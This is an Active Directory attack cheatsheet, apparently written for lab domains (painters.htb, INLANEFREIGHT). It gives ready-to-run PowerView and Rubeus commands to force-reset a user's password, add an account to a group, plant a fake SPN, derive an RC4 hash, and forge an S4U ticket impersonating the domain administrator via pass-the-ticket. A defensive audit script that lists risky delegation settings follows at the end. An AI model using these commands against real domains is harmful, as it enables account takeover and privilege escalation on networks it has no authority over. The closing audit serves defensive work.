Abuse some ACL

Just another cheatsheet

ForceChangePassword

Import-Module .\PowerView.ps1
Set-DomainUserPassword -Domain painters.htb -Identity blake -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose

GenericWrite

Add user to group

$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred -Verbose

Add fake SPN

Set-DomainObject -Credential $Cred -Identity adunn -Set @{serviceprincipalname='notahacker/LEGIT'} -Verbose

Remove SPN

Set-DomainObject -Credential $Cred -Identity adunn -Clear serviceprincipalname -Verbose

AllowedToDelegate

Delegation concept:

The account must have the TRUSTED_TO_AUTH_FOR_DELEGATION flag set in its userAccountControl attribute for it to be able to authenticate to the remote service on behalf of another user.

TRUSTED_TO_AUTH_FOR_DELEGATION - (Windows 2000/Windows Server 2003) The account is enabled for delegation. This is a security-sensitive setting. Accounts that have this option enabled should be tightly controlled. This setting lets a service that runs under the account assume a client's identity and authenticate as that user to other remote servers on the network.

https://support.microsoft.com/en-gb/help/305144/how-to-use-useraccountcontrol-to-manipulate-user-account-properties

Check the msDS-AllowedToDelegateTo attribute with PowerView

Get-NetUser -TrustedToAuth

Derive the RC4 hash from the cleartext password

Rubeus.exe hash /domain:"DC.painters.htb" /user:"blake" /password:"Password123!"

Pass the ticket

Rubeus.exe s4u /nowrap /msdsspn:"cifs/DC.painters.htb" /impersonateuser:"administrator" /domain:"painters.htb" /user:"blake" /rc4:"2B576ACBE6BCFDA7294D6BD18041B8FE" /ptt
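As an added defender-side check (not part of the original cheatsheet), the following PowerShell audit lists the accounts that carry both msDS-AllowedToDelegateTo and the TRUSTED_TO_AUTH_FOR_DELEGATION flag described above, and the privileged users that are still impersonable through such a delegation chain; it assumes the RSAT ActiveDirectory module is available.

```powershell
# Added audit example; not part of the original page. Assumes the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

# userAccountControl bits (see the Microsoft KB linked above)
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # protocol transition (S4U2Self) allowed
$NOT_DELEGATED                  = 0x100000    # "Account is sensitive and cannot be delegated"

# LDAP_MATCHING_RULE_BIT_AND: lets the DC evaluate the bit test server-side
$bitAnd = '1.2.840.113556.1.4.803'

function Get-ProtocolTransitionAccounts {
    # Accounts that have msDS-AllowedToDelegateTo populated AND the
    # TRUSTED_TO_AUTH flag. These can request service tickets to the listed
    # SPNs on behalf of arbitrary users, so each one needs an owner and a review.
    $filter = "(&(msDS-AllowedToDelegateTo=*)(userAccountControl:$bitAnd:=$TRUSTED_TO_AUTH_FOR_DELEGATION))"
    Get-ADObject -LDAPFilter $filter -Properties msDS-AllowedToDelegateTo, servicePrincipalName, whenChanged |
        ForEach-Object {
            [pscustomobject]@{
                Account     = $_.Name
                ObjectClass = $_.ObjectClass
                DelegatesTo = ($_.'msDS-AllowedToDelegateTo' -join '; ')
                SPNs        = ($_.servicePrincipalName -join '; ')
                WhenChanged = $_.whenChanged
            }
        }
}

function Get-UnprotectedPrivilegedUsers {
    # Privileged users (adminCount=1) that are NOT marked sensitive. These are
    # the identities an S4U2Self/S4U2Proxy chain can impersonate; setting
    # NOT_DELEGATED (or Protected Users membership) makes the KDC refuse them.
    $filter = "(&(adminCount=1)(!(userAccountControl:$bitAnd:=$NOT_DELEGATED)))"
    Get-ADUser -LDAPFilter $filter -Properties adminCount, userAccountControl |
        Select-Object SamAccountName, Enabled, userAccountControl
}

Get-ProtocolTransitionAccounts | Format-Table -AutoSize
Get-UnprotectedPrivilegedUsers | Format-Table -AutoSize
```

Any account in the first list that delegates to an SPN it does not need, and any user in the second list, is a finding to remediate.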
